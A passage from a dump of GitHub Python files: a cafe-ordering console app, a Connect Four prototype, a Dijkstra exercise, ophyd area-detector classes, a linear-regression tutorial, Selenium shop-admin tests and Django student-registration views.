print(\"\\n\\n\")\r\n print(\"|\" * 50)\r\n print(\" Setelah menambahkan diskon: \\n\")\r\n\r\n if Makanan >= 2:\r\n print(\" Diskon pembelian minimal 2 makanan sebesar 5%\")\r\n Diskon += 5\r\n if Minuman >= 3:\r\n print(\" Diskon pembelian minimal 3 minuman sebesar 10%\")\r\n Diskon += 10\r\n if Emoney == \"yes\":\r\n print(\" Diskon penggunaan E-money sebesar 5%\")\r\n if day >= 5:\r\n print(\" Diskon weekend sebesar 5%\")\r\n else:\r\n print(\" Diskon weekdays sebesar 10%\")\r\n print(\"|\" * 50)\r\n\r\n HargaTotal = int(HargaTotal - HargaTotal * Diskon / 100)\r\n print(\"\\n\\n \\033[1;37;41m Harga yang harus Anda bayar: \", HargaTotal, \"Ivory Coins\\033[1;37;40m\")\r\n input()\r\n MenuAwal += 1\r\n break\r\n\r\n elif GrandFinale.casefold() == \"no\" or GrandFinale.casefold() == \"tidak\" or GrandFinale.casefold() == \"n\":\r\n clear()\r\n break\r\n else:\r\n print(\"\\n\\033[0;33;40m V: \\\"Mohon ketik \\\"yes\\\" atau \\\"no\\\"\\\"\\033[0;37;40m\")\r\n input()\r\n\r\n else: \r\n print(\"\\n\\033[0;33;40m V: \\\"Menunya gaada.. (atau belum ada?)\\\"\\033[0;37;40m\")\r\n input()\r\n clear()\r\n","repo_name":"Viabelous/PRAKTIKUM-ALPRO-SMST-1","sub_path":"CafeTime.py","file_name":"CafeTime.py","file_ext":"py","file_size_in_byte":20327,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18774853288","text":"def tableroVacio():\n\treturn [\n\t\t\t[0,0,0,0,0,0,0],\n\t\t\t[0,0,0,0,0,0,0],\n\t\t\t[0,0,0,0,0,0,0],\n\t\t\t[0,0,0,0,0,0,0],\n\t\t\t[0,0,0,0,0,0,0],\n\t\t\t[0,0,0,0,0,0,0],\n\t\t\t]\n\ndef completarTableroEnOrden(secuencia,tablero):\n\tfor i, columna in enumerate(secuencia):\n\t\tif i % 2 :\n\t\t\tfichaNumero = 2 \n\t\telse:\n\t\t\tfichaNumero = 1\n\t\tsoltarFichaEnColumna(fichaNumero, columna, tablero)\n\treturn tablero\n\ndef soltarFichaEnColumna(ficha, columna, tablero):\n\tfor fila in range(6, 0, -1):\n\t\tif tablero [fila - 1] [columna - 1] == 0:\n\t\t\ttablero [fila - 1] [columna - 1] = ficha\n\t\t\treturn\n\ndef marcoTablero(tablero):\t\t\t#Modifique la función anterior (dibujarTablero) para crear marcoTablero y así mostrar una mejor estetica\n\tfor fila in tablero:\n\t\t\tprint(\"║\", end =\" \")\n\t\t\tfor celda in fila:\n\t\t\t\tif celda == 0:\n\t\t\t\t \tprint(' o ', end = '')\n\t\t\t\telse:\n\t\t\t\t\tprint(' %s ' % celda, end = '')\n\t\t\tprint('║')\t\n\tprint(\"╚══════════════════════╝\")\n\ndef secuenciaValida(secuencia):\n\tfor columna in secuencia:\n\t\tif columna < 1 or columna > 7:\n\t\t\treturn False\n\treturn True\n\ndef contenidoColumna(nro_columna, tablero):\n\tcolumna = []\n\tfor fila in tablero:\n\t\tcelda = fila[nro_columna - 1]\n\t\tcolumna.append(celda)\n\treturn columna\n\ndef todasColumnas(tablero):\n\tcolumnas = []\n\tfor i in range(7):\n\t\tcolumna = contenidoColumna((i+1), tablero)\n\t\tcolumnas.append(columna)\n\treturn columnas\n\ndef contenidoFila(nro_fila, tablero):\n fila = tablero[nro_fila-1]\n return fila\n\ndef todasFilas(tablero):\n\treturn tablero\n\nsecuencia_texto = input(\"ingrese la secuencia de numeros\")\nsecuencia = []\nfor items in secuencia_texto.split(','):\n\tsecuencia.append(int(items))\ntablero = []\nif secuenciaValida(secuencia):\n\ttablero = completarTableroEnOrden(secuencia, tableroVacio())\n\tmarcoTablero(tablero)\nelse:\n\tprint(\"Las columnas deberian ir de 1 al 7\")\n\n\n\n\n","repo_name":"Oricasini/4EnLinea2021","sub_path":"Prototipo.py","file_name":"Prototipo.py","file_ext":"py","file_size_in_byte":1844,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70445966186","text":"import sys\r\nimport heapq\r\ninput = lambda:sys.stdin.readline().rstrip()\r\nINF = int(1e9)\r\n\r\n#c에서 시작, 최대한 많이 퍼지게, 걸리는 시간\r\nn, m, c = map(int, input().split())\r\ngraph = [[] for i in range(n+1)]\r\ndistance = [INF] * (n+1)\r\n\r\nfor _ in range(m):\r\n x, y, z = map(int, input().split())\r\n graph[x].append((y, z))\r\n\r\ndef dijkstra(start):\r\n q = []\r\n heapq.heappush(q, (0, start))\r\n distance[start] = 0\r\n while q:\r\n dist, now = heapq.heappop(q)\r\n if distance[now] < dist:\r\n continue\r\n\r\n for i in graph[now]:\r\n cost = dist + i[1]\r\n if cost < distance[i[0]]:\r\n distance[i[0]] = cost\r\n heapq.heappush(q, (cost, i[0]))\r\n\r\ndijkstra(c)\r\nprint(distance)\r\ncnt = 0\r\ncost = 0\r\nfor i in distance:\r\n if i != INF:\r\n cnt += 1\r\n if i > cost:\r\n cost = i\r\n\r\nprint(cnt-1, cost)\r\n\r\n#플로이드 워셜 알고리즘으로 풀어본건데 이게 맞는지는 알수 없음....\r\n'''\r\n#c에서 시작, 최대한 많이 퍼지게, 걸리는 시간\r\nn, m, c = map(int, input().split())\r\ngraph = [[INF] * (n+1) for _ in range(n+1)]\r\n\r\nfor _ in range(m):\r\n x, y, z = map(int, input().split())\r\n graph[x][y] = z\r\n\r\nfor a in range(1, n+1):\r\n for b in range(1, n+1):\r\n if a == b:\r\n graph[a][b] = 0\r\n\r\nfor k in range(1, n+1):\r\n for a in range(1, n+1):\r\n for b in range(1, n+1):\r\n graph[a][b] = min(graph[a][b], graph[a][k] + graph[k][b])\r\n\r\ncnt = 0\r\nfor i in range(1, n+1):\r\n if graph[c][i] != INF and i != c:\r\n cnt += 1\r\n\r\nprint(cnt, max(graph[c]))\r\n'''","repo_name":"kdozlo/algorithm-study-Python","sub_path":"algorithm_study/thisispython_part2/p263.py","file_name":"p263.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34662897129","text":"import time\nimport numpy\nimport threading\nfrom ophyd import select_version, Component, EpicsSignalRO, \\\n\tEpicsSignal, ADBase, ADComponent, EpicsSignalWithRBV, \\\n\tDetectorBase, CamBase, HDF5Plugin, ADTriggerStatus\nfrom ophyd.device import BlueskyInterface, Staged\nfrom ophyd.signal import AttributeSignal\nfrom ophyd.areadetector.plugins import PluginBase\nfrom ophyd.areadetector.filestore_mixins import \\\n\tFileStoreHDF5, FileStoreIterativeWrite\nfrom ophyd.utils.errors import UnprimedPlugin\nfrom .ophyd import ThrottleMonitor\n\nMyHDF5Plugin = select_version(HDF5Plugin, (3, 15))\n\nclass MyTriggerBase(BlueskyInterface):\n\t_status_type = ADTriggerStatus\n\n\tdef __init__(self, *args, image_name = None, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tif image_name is None:\n\t\t\timage_name = \"_\".join([self.name, \"image\"])\n\t\tself._image_name, self._datum_keys = image_name, [image_name]\n\nclass SoftTrigger(MyTriggerBase):\n\t_acquisition_signal = \"cam.acquire\"\n\t_counter_signal = _orig_acquire = _status = None\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tif self._acquisition_signal:\n\t\t\tself._acquisition_signal = getattr(self, self._acquisition_signal)\n\t\tif self._counter_signal:\n\t\t\tself._counter_signal = getattr(self, self._counter_signal)\n\t\tself.stage_sigs.update([(\"cam.acquire\",\n\t\t\t0 if self._acquisition_signal == self.cam.acquire else 1)])\n\n\tdef stage(self):\n\t\tself._orig_acquire = self.cam.acquire.get()\n\t\tif self._orig_acquire == self.stage_sigs[\"cam.acquire\"] == 1:\n\t\t\tself.cam.acquire.put(0)\n\t\t(self._counter_signal or self._acquisition_signal)\\\n\t\t\t.subscribe(self._acquire_changed)\n\t\tsuper().stage()\n\n\tdef unstage(self):\n\t\tsuper().unstage()\n\t\t(self._counter_signal or self._acquisition_signal)\\\n\t\t\t.clear_sub(self._acquire_changed)\n\t\tif self._orig_acquire == self.stage_sigs[\"cam.acquire\"] == 1:\n\t\t\tself.cam.acquire.put(1)\n\n\tdef trigger(self):\n\t\tassert self._staged == Staged.yes\n\t\tself._status = self._status_type(self)\n\t\tself._acquisition_signal.put(1)\n\t\tself.dispatch(self._image_name, time.time())\n\t\treturn self._status\n\n\tdef _acquire_changed(self, *, value, old_value, **kwargs):\n\t\tif self._status is None:\n\t\t\treturn\n\t\tif self._counter_signal or (old_value == 1 and value == 0):\n\t\t\tstatus, self._status = self._status, None\n\t\t\tstatus.set_finished()\n\nclass DxpTrigger(MyTriggerBase):\n\t_started, _unstage_time = False, 0.2\n\n\tdef stage(self):\n\t\tsuper().stage()\n\t\tself._started = False\n\n\tdef unstage(self):\n\t\tif self._started:\n\t\t\tself.cam.next_pixel.put(1)\n\t\t\ttime.sleep(self._unstage_time)\n\t\t\tself.cam.stop_all.put(1)\n\t\t\tif not self.cam.wait_acquiring(False):\n\t\t\t\tsuper().unstage()\n\t\t\t\traise TimeoutError\\\n\t\t\t\t\t(\"Timeout waiting for %r to be low\" % self.cam.acquiring)\n\t\t\tself._started = False\n\t\tsuper().unstage()\n\n\tdef wait_finish(self):\n\t\tpixels = self.cam.pixels_per_run.get()\n\t\tif pixels > 0 or not self._started:\n\t\t\tif pixels <= 0:\n\t\t\t\tself._started = True\n\t\t\tself.cam.erase_start.put(1)\n\t\t\tif not self.cam.wait_acquiring(True):\n\t\t\t\traise TimeoutError\\\n\t\t\t\t\t(\"Timeout waiting for %r to be high\" % self.cam.acquiring)\n\t\telse:\n\t\t\tself.cam.next_pixel.put(1)\n\t\tif pixels > 0:\n\t\t\tfor i in range(pixels):\n\t\t\t\ttime.sleep(self.cam.preset_real.get())\n\t\t\t\tself.cam.next_pixel.put(1)\n\t\telse:\n\t\t\ttime.sleep(self.cam.preset_real.get())\n\t\tif pixels > 0 and not self.cam.wait_acquiring(False):\n\t\t\tself.cam.stop_all.put(1)\n\t\t\traise TimeoutError\\\n\t\t\t\t(\"Timeout waiting for %r to be low\" % self.cam.acquiring)\n\n\tdef trigger(self):\n\t\tassert self._staged == Staged.yes\n\t\tstatus = self._status_type(self)\n\t\tself.dispatch(self._image_name, time.time())\n\t\tdef wait():\n\t\t\ttry:\n\t\t\t\tself.wait_finish()\n\t\t\texcept Exception as exc:\n\t\t\t\tstatus.set_exception(exc)\n\t\t\t\traise\n\t\t\tstatus.set_finished()\n\t\tthreading.Thread(target = wait, daemon = True).start()\n\t\treturn status\n\nclass DxpDetectorBase(DetectorBase):\n\tmake_data_key = lambda self: dict(\n\t\tshape = (1,) + tuple(self.hdf1.array_size.get())[-2:],\n\t\tsource = \"PV.\" + self.prefix, dtype = \"array\", external = \"FILESTORE:\"\n\t)\n\nclass CptHDF5(MyHDF5Plugin, FileStoreHDF5, FileStoreIterativeWrite):\n\tget_frames_per_point = lambda self: self.parent.cam.num_images.get()\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.filestore_spec = \"AD_HDF5_SWMR\"\n\n\tdef warmup(self):\n\t\tself.enable.set(1).wait()\n\t\tself.swmr_mode.set(1).wait()\n\nclass CptHDF5Dxp(CptHDF5):\n\tdef get_frames_per_point(self):\n\t\treturn max(self.parent.cam.pixels_per_run.get(), 1)\n\nclass MyImagePlugin(ThrottleMonitor, PluginBase):\n\t_plugin_type = \"NDPluginStdArrays\"\n\tarray_data = Component(EpicsSignalRO, \"ArrayData\", auto_monitor = True)\n\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper().__init__(*args, **kwargs)\n\t\tself.disable_on_stage()\n\t\tself.ensure_nonblocking()\n\n\tdef monitor(self, dnotify):\n\t\timage_name, _timestamp = self.parent._image_name, [0.0]\n\t\tdef cb(*, value, timestamp, **kwargs):\n\t\t\tif value is None or not self.maybe_monitor(_timestamp, timestamp):\n\t\t\t\treturn\n\t\t\tshape = list(self.array_size.get())\n\t\t\twhile True:\n\t\t\t\tif not shape:\n\t\t\t\t\treturn\n\t\t\t\tif all(shape):\n\t\t\t\t\tbreak\n\t\t\t\tshape.pop(0)\n\t\t\tdnotify(\"monitor/image\", {\n\t\t\t\t\"data\": {image_name: value[:numpy.prod(shape)].reshape(shape)},\n\t\t\t\t\"timestamps\": {image_name: timestamp}\n\t\t\t})\n\t\treturn self.array_data.subscribe(cb, run = False)\n\nclass MyCam(CamBase):\n\tdef warmup(self, sleep = 2.0):\n\t\tsigs = [(self.array_callbacks, 1), (self.acquire, 1)]\n\t\torig_vals = [(sig, sig.get()) for sig, val in sigs]\n\n\t\tfor sig, val in sigs:\n\t\t\ttime.sleep(0.1)\n\t\t\tsig.put(val)\n\t\tif sleep > 0:\n\t\t\ttime.sleep(sleep)\n\t\telse:\n\t\t\tfor i in range(100):\n\t\t\t\tif not self.acquire.get():\n\t\t\t\t\tbreak\n\t\t\t\ttime.sleep(0.1)\n\t\tfor sig, val in reversed(orig_vals):\n\t\t\tsig.set(val).wait()\n\nclass DxpCam(ADBase):\n\t_default_configuration_attrs = ADBase._default_configuration_attrs + (\n\t\t\"collect_mode\", \"ignore_gate\", \"input_logic_polarity\",\n\t\t\"pixel_advance_mode\", \"pixels_per_run\", \"pixels_per_buffer\",\n\t\t\"auto_pixels_per_buffer\", \"preset_mode\", \"preset_real\"\n\t)\n\n\tport_name = ADComponent(EpicsSignalRO, \"Asyn.PORT\", string = True)\n\tcollect_mode = ADComponent(EpicsSignalWithRBV, \"CollectMode\")\n\tignore_gate = ADComponent(EpicsSignalWithRBV, \"IgnoreGate\")\n\tinput_logic_polarity = ADComponent(EpicsSignalWithRBV, \"InputLogicPolarity\")\n\tpixel_advance_mode = ADComponent(EpicsSignalWithRBV, \"PixelAdvanceMode\")\n\tpixels_per_run = ADComponent(EpicsSignalWithRBV, \"PixelsPerRun\")\n\tpixels_per_buffer = ADComponent(EpicsSignalWithRBV, \"PixelsPerBuffer\")\n\tauto_pixels_per_buffer = \\\n\t\tADComponent(EpicsSignalWithRBV, \"AutoPixelsPerBuffer\")\n\tpreset_mode = ADComponent(EpicsSignal, \"PresetMode\")\n\tpreset_real = ADComponent(EpicsSignal, \"PresetReal\")\n\terase_start = ADComponent(EpicsSignal, \"EraseStart\")\n\tstop_all = ADComponent(EpicsSignal, \"StopAll\")\n\tnext_pixel = ADComponent(EpicsSignal, \"NextPixel\")\n\tacquiring = ADComponent(EpicsSignal, \"Acquiring\")\n\n\tdef wait_acquiring(self, val):\n\t\tfor i in range(100):\n\t\t\tif bool(self.acquiring.get()) == bool(val):\n\t\t\t\treturn True\n\t\t\ttime.sleep(0.1)\n\t\telse:\n\t\t\treturn False\n\n\tdef warmup(self):\n\t\tself.erase_start.put(1)\n\t\tself.wait_acquiring(True)\n\t\tself.next_pixel.put(1)\n\t\tself.wait_acquiring(False)\n\t\tself.stop_all.put(1)\n\nclass SitoroCam(DxpCam):\n\t_default_configuration_attrs = \\\n\t\tDxpCam._default_configuration_attrs + (\"ndarray_mode\",)\n\tndarray_mode = ADComponent(EpicsSignalWithRBV, \"NDArrayMode\")\n\ndef make_detector(name, inherit = None, **kwargs):\n\tif not inherit:\n\t\tinherit = (SoftTrigger, DetectorBase)\n\tdef warmup(obj):\n\t\tobj.hdf1.warmup()\n\t\tobj.cam.warmup()\n\t\tif not sum(obj.hdf1.array_size.get()):\n\t\t\traise UnprimedPlugin(\"%s failed to warm up\" % obj.hdf1.vname())\n\tdef monitor(obj, dnotify):\n\t\treturn obj.image1.monitor(dnotify)\n\tattrs = {\n\t\t\"_default_read_attrs\": [\"hdf1\"],\n\t\t\"cam\": Component(MyCam, \"cam1:\"),\n\t\t\"hdf1\": Component(CptHDF5, \"HDF1:\", write_path_template = \"/\"),\n\t\t\"image1\": Component(MyImagePlugin, \"image1:\"),\n\t\t\"warmup\": warmup, \"monitor\": monitor\n\t}\n\tfor k, v in kwargs.items():\n\t\tif v is None:\n\t\t\tattrs.pop(k, None)\n\t\telse:\n\t\t\tattrs[k] = v\n\treturn type(name, inherit, attrs)\n\nMyAreaDetector = make_detector(\"MyAreaDetector\")\nBaseAreaDetector = make_detector\\\n\t(\"BaseAreaDetector\", image1 = None, monitor = None)\nDxpDetector, SitoroDetector = [make_detector(\n\tname, (DxpTrigger, DxpDetectorBase), cam = Component(cam, \"\"),\n\thdf1 = Component(CptHDF5Dxp, \"HDF1:\", write_path_template = \"/\"),\n\timage1 = None, monitor = None\n) for name, cam in [(\"DxpDetector\", DxpCam), (\"SitoroDetector\", SitoroCam)]]\n\n","repo_name":"CasperVector/mamba-ose","sub_path":"butils/ad.py","file_name":"ad.py","file_ext":"py","file_size_in_byte":8463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10819016892","text":"# Import pandas, numpy, matplotlib,and seaborn. Then set %matplotlib inline \nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as py\nimport seaborn as sns\n\n\n# Read in the Ecommerce Customers csv file as a DataFrame called customers.\ncustomers = pd.read_csv(\"Ecommerce Customers\")\n\n# Check the head of customers, and check out its info() and describe() methods.\ncustomers.head()\ncustomers.info()\ncustomers.describe()\n\n# Exploratory Data Analysis\n\n# Use seaborn to create a jointplot to compare the Time on Website and Yearly Amount Spent columns. Does the correlation make sense?\nsns.jointplot(x='Time on Website',y='Yearly Amount Spent', data=customers)\n\n#Do the same but with the Time on App column instead.\nsns.jointplot(x='Time on App',y='Yearly Amount Spent', data=customers)\n\n#Use jointplot to create a 2D hex bin plot comparing Time on App and Length of Membership.\nsns.jointplot(x='Time on App',y='Length of Membership', data=customers,kind='hex')\n\n# Let's explore these types of relationships across the entire data set. Use pairplot to recreate the plot below.\nsns.pairplot(data=customers)\n\n# Based off this plot what looks to be the most correlated feature with Yearly Amount Spent?\n# Length of Membership\n\n# Create a linear model plot (using seaborn's lmplot) of Yearly Amount Spent vs. Length of Membership.\nsns.lmplot(x='Length of Membership',y='Yearly Amount Spent',data=customers)\n\n# Training and Testing Data\n\n# Now that we've explored the data a bit, let's go ahead and split the data into training and testing sets. Set a variable X equal to the numerical features of the customers and a variable y equal to the \"Yearly Amount Spent\" column\nX =customers[['Avg. Session Length','Time on App','Time on Website','Length of Membership']]\nX.head()\nY=customers['Yearly Amount Spent']\nY.head()\n\n# Use model_selection.train_test_split from sklearn to split the data into training and testing sets. Set test_size=0.3 and random_state=101\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, Y_train, Y_test = train_test_split(X,Y, test_size=0.3,random_state=101)\n\n#Training the Model\n\n# Now its time to train our model on our training data! Import LinearRegression from sklearn.linear_model\nfrom sklearn.linear_model import LinearRegression\n\n# Create an instance of a LinearRegression() model named lm.\nlm = LinearRegression()\n\n# Train/fit lm on the training data.\nlm.fit(X_train,Y_train)\n\n#Print out the coefficients of the model\nprint(lm.coef_)\n\n# Predicting Test Data\n\n# Now that we have fit our model, let's evaluate its performance by predicting off the test values! Use lm.predict() to predict off the X_test set of the data.\nprediction = lm.predict(X_test)\n\n# Create a scatterplot of the real test values versus the predicted values.\npy.scatter(Y_test,prediction)\n\n# Evaluating the Model\n\n# Let's evaluate our model performance by calculating the residual sum of squares and the explained variance score (R^2).Calculate the Mean Absolute Error, Mean Squared Error, and the Root Mean Squared Error.\nfrom sklearn import metrics\nprint('MAE= ', metrics.mean_absolute_error(Y_test,prediction) )\nprint('MSE= ', metrics.mean_squared_error(Y_test,prediction))\nprint('RMSE:', np.sqrt(metrics.mean_squared_error(Y_test, prediction)))\n\n# Residuals\n\n# Let's quickly explore the residuals to make sure everything was okay with our data. Plot a histogram of the residuals and make sure it looks normally distributed. Using plt.hist()\npy.hist(prediction-Y_test,bins=50)\n\n# Conclusion\n\n# do we focus our efforst on mobile app or website development\ncoeffecients = pd.DataFrame(lm.coef_,X.columns)\ncoeffecients.columns = ['Coeffecient']\ncoeffecients\n\n# How can you interpret these coefficients?\n\n# Interpreting the coefficients:\n\n# Holding all other features fixed, a 1 unit increase in Avg. Session Length is associated with an increase of 25.98 total dollars spent.\n# Holding all other features fixed, a 1 unit increase in Time on App is associated with an increase of 38.59 total dollars spent.\n# Holding all other features fixed, a 1 unit increase in Time on Website is associated with an increase of 0.19 total dollars spent.\n# Holding all other features fixed, a 1 unit increase in Length of Membership is associated with an increase of 61.27 total dollars spent.\n# Do you think the company should focus more on their mobile app or on their website?\n\n# There are two ways to think about this: Develop the Website to catch up to the performance of the mobile app, or develop the app more since that is what is working better!!\n","repo_name":"surmayi/DataScience","sub_path":"LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16118155274","text":"from positions.shops_manage import Shops_Manage\nfrom time import sleep\nfrom test_case.mytest import MyTest\nfrom positions.login import login_operate\nfrom positions.home_page import Home_page\n\nclass shops_manage(MyTest):\n def test_shops_check_in(self):\n \"\"\"验证商家入驻\"\"\"\n ha = login_operate(self.driver)\n ha.open() ###打开浏览器\n ha.log_in()\n sleep(1.5)\n # ha.screen_shot()\n ha.Get(\"ShopDetail/0/edit\")\n hb = Shops_Manage(self.driver)\n hb.Create_account()\n hb.Shops_id()\n hb.Shops_password()\n hb.Shops_num()\n hb.Shops_name()\n hb.Shop_name()\n hb.Shops_logo()\n hb.Key_word()\n hb.Shops_photo()\n hb.Business_license()\n hb.Company_name()\n hb.Company_certifyNO()\n hb.Company_certifyName()\n hb.Company_identityNo()\n hb.Bank()\n hb.Bank_companyName()\n hb.Bank_blankNo()\n hb.Bank_blankName()\n hb.Other()\n sleep(1.5)\n hb.Shop_grade()\n hb.Merchant_companyGrade()\n sleep(1.5)\n hb.Shop_class()\n hb.Merchant_companyType()\n sleep(1.5)\n hb.Submit()\n sleep(1)\n\n def test_placeholder_query(self):\n \"\"\"验证商家ID查询\"\"\"\n ha = login_operate(self.driver)\n ha.open() ###打开浏览器\n ha.log_in()\n sleep(1.5)\n ha.Get(\"Shop\")\n hb = Shops_Manage(self.driver)\n obj=hb.Text_Value(2)\n hb.Placeholder(obj)\n hb.Query()\n sleep(1)\n if hb.Shop_nu()[0]>0:\n mur=hb.Text_Value(2)\n self.assertEqual(obj,mur)\n else:\n raise Exception('查询无数据')\n\n def test_shop_ID_query(self):\n \"\"\"验证商家ID查询\"\"\"\n ha = login_operate(self.driver)\n ha.open() ###打开浏览器\n ha.log_in()\n sleep(1.5)\n ha.Get(\"Shop\")\n hb = Shops_Manage(self.driver)\n obj=hb.Text_Value(3)\n hb.Placeholder(obj)\n hb.Query()\n sleep(1)\n if hb.Shop_nu()[0]>0:\n mur=hb.Text_Value(3)\n self.assertEqual(obj,mur)\n else:\n raise Exception('查询无数据')\n\n def test_store_name(self):\n \"\"\"验证商家名称查询\"\"\"\n ha = login_operate(self.driver)\n ha.open() ###打开浏览器\n ha.log_in()\n sleep(1.5)\n ha.Get(\"Shop\")\n hb = Shops_Manage(self.driver)\n obj = hb.Text_Value(4)\n hb.Store_name(obj)\n hb.Query()\n sleep(1)\n if hb.Shop_nu()[0] > 0:\n mur = hb.Text_Value(4)\n self.assertEqual(obj, mur)\n else:\n raise Exception('查询无数据')\n\n def test_store_grade(self):\n \"\"\"验证商家等级查询\"\"\"\n ha = login_operate(self.driver)\n ha.open() ###打开浏览器\n ha.log_in()\n sleep(1.5)\n ha.Get(\"Shop\")\n hb = Shops_Manage(self.driver)\n sleep(1)\n obj = hb.Store_grade()\n hb.Query()\n sleep(1)\n if hb.Shop_nu()[0] > 0:\n mur = hb.Text_Value(5)\n self.assertEqual(obj, mur)\n else:\n raise Exception('查询无数据')\n\n\n def test_store_Recharge(self):\n \"\"\"验证商家充值\"\"\"\n ha = login_operate(self.driver)\n ha.open() ###打开浏览器\n ha.log_in()\n sleep(1.5)\n ha.Get(\"Shop\")\n hb = Shops_Manage(self.driver)\n mur=hb.Remain_sum_and_recharge()\n n=hb.Recharge_money()\n hb.Recharge_Confirm_or_Cancel()\n sleep(1.5)\n obj=hb.text_Remain(mur[0])\n self.assertEqual(str(int(mur[1])+n),str(obj))\n sleep(10)\n\n","repo_name":"SXL5519/Operating_background_test_01","sub_path":"test_case/case_shops.py","file_name":"case_shops.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"43277686391","text":"from django.shortcuts import render\nfrom .models import Student, Registration\nfrom django.views.generic import ListView, DetailView\nfrom django.db import connection\nfrom django.http import HttpResponse\n\n\ndef testmysql(request):\n return render(request, 'home.html')\n\n\n# StudentList class should be deleted later on.\nclass StudentList(ListView):\n template_name = 'student/student_list.html'\n model = Student\n\n\n# Student home page.\nclass StudentHome(DetailView):\n template_name = 'student/student_home.html'\n model = Student\n\n\n# Student main page after logging in.\n\n\nclass StudentDetails(DetailView):\n template_name = 'student/student_profile.html'\n model = Student\n\n\ndef getStudentNotification(request, student_id):\n res = {\n 'student_id': int(student_id),\n 'pending_list': [],\n }\n\n for r in getPendingApprovals(student_id):\n res['pending_list'].append({'course_num': r, 'course_name': getNameByCourseNum(r),\n 'status': 'Pending for approval'})\n\n context = {\n \"data\": res\n }\n\n return render(request, 'student/student_notification.html', context)\n\n\ndef dropCourse(request, student_id):\n cursor = connection.cursor()\n course_currently_taking = getCourseCurrentlyTakingOrPending(student_id)\n if request.method == 'POST':\n nuid = student_id\n course_id = int(request.POST['course_number'])\n\n advisor_id = getAdvisorByStudentId(student_id)\n\n cursor.execute('''SELECT * from registration''')\n all_registration_info = cursor.fetchall()\n\n if course_id not in course_currently_taking:\n return HttpResponse('You cannot drop this course')\n elif nuid != student_id:\n return HttpResponse('Please correct your niud.')\n else:\n\n cursor.execute('''DELETE FROM registration WHERE nuid = %(nuid)s AND course_id = %(course_id)s ''',\n {'nuid': nuid, 'course_id': course_id})\n updateEnrolledStudents(course_id)\n return HttpResponse('Drop succeed')\n\n res = {\n 'student_id': int(student_id),\n 'course_taking': [],\n }\n\n for course in range(len(course_currently_taking)):\n res['course_taking'].append({'course_num': str(course_currently_taking[course]), 'course_name':\n getNameByCourseNum(course_currently_taking[course]),\n 'status': getStudentCourseStatus(student_id, course_currently_taking[course])})\n\n context = {\n \"data\": res\n }\n\n cursor.close()\n return render(request, 'student/drop_course.html', context)\n\n\ndef getDegreeAudit(request, student_id):\n cursor = connection.cursor()\n res = {\n 'student_id': int(student_id),\n 'overall_gpa': [],\n 'in_progress': [],\n 'complete_list': [],\n 'grade': [],\n 'cumulative_pts': [],\n 'cumulative_sh': [],\n }\n\n # Build in progress print list.\n for ea in getCourseInProgress(student_id):\n res['in_progress'].append({'course_id': str(ea), 'course_name': getNameByCourseNum(ea), 'grade': 'IP'})\n\n # Get course list that the student have completed.\n cursor.execute('''SELECT * FROM registration WHERE (status = 'failed' OR status = 'completed') ''')\n comp_list = cursor.fetchall()\n\n # grade_map = {4.00: 'A', 3.66: 'A-', 3.33: 'B+', 3: 'B', 2.66: 'B-', 2.33: 'C+', 2.00: 'C', 1.66: 'C-',\n # 1.33: 'D+', 1.00: 'D', 0: 'F'}\n\n cum_sh = 0\n cum_gpa = 0.0\n\n for comp in comp_list:\n if comp[0] == int(student_id):\n course_id = comp[1]\n course_id = {'course_id': int(course_id)}\n cursor.execute('''SELECT semester_hrs FROM course WHERE course_id = %(course_id)s''', course_id)\n # Semester hours.\n sh = cursor.fetchall()[0][0]\n cum_sh += sh\n cum_gpa += sh * min(4.0, comp[3])\n res['complete_list'].append({'course_id': comp[1], 'grade': getGrade(comp[3]),\n 'course_name': getCourseNameByCourseNum(comp[1]),\n 'points_earned': sh * min(4.0, comp[3])})\n\n res['cumulative_sh'].append(\"Cumulative Semester Hours: \" + str(round(cum_sh, 2)))\n res['cumulative_pts'].append(\"Cumulative Points: \" + str(round(cum_gpa, 2)))\n if cum_sh == 0:\n res['overall_gpa'].append(\"Overall GPA: \" + str(0))\n else:\n res['overall_gpa'].append(\"Overall GPA: \" + str(calculateStudentGpa(student_id)))\n updateStudentGpa(student_id)\n\n context = {\n \"data\": res\n }\n\n cursor.close()\n return render(request, 'student/degree_audit.html', context)\n\n\ndef getRegistrationInfo(request, student_id):\n cursor = connection.cursor()\n for c in getCourseNumList():\n updateEnrolledStudents(c)\n # Submit course registration form.\n if request.method == 'POST':\n nuid = student_id\n course_id = int(request.POST['course_number'])\n advisor_id = getAdvisorByStudentId(student_id)\n\n cursor.execute('''SELECT * from registration''')\n all_registration_info = cursor.fetchall()\n cursor.execute('''SELECT employee_id from advisor''')\n advisor_list = cursor.fetchall()\n\n # Invalid case 1: Student has submitted course registration form or has taken previously.\n for i in range(len(all_registration_info)):\n if nuid == all_registration_info[i][0] and course_id == all_registration_info[i][1]:\n return HttpResponse('Error, you cannot submit the same form.')\n if course_id not in getCourseNumList():\n return HttpResponse('Course number you put is not in the course list, please'\n 'input a correct course num.')\n elif isCourseFull(course_id):\n return HttpResponse('The course you registered for has reached the capacity')\n elif getStudentCurSh(student_id, course_id) > getStudentMaxSh(student_id):\n return HttpResponse('You have reached the maximum semester hour courses you can register')\n elif isConflict(student_id, course_id):\n return HttpResponse('There is a time conflict on your schedule, you cannot register this course')\n else:\n Registration.objects.create(nuid=nuid, course_id=course_id, advisor_id=advisor_id, grade=None,\n status='pending')\n return HttpResponse(\"Registration succeed, please waiting the advisor for approval\")\n\n nuid = int(student_id)\n res = 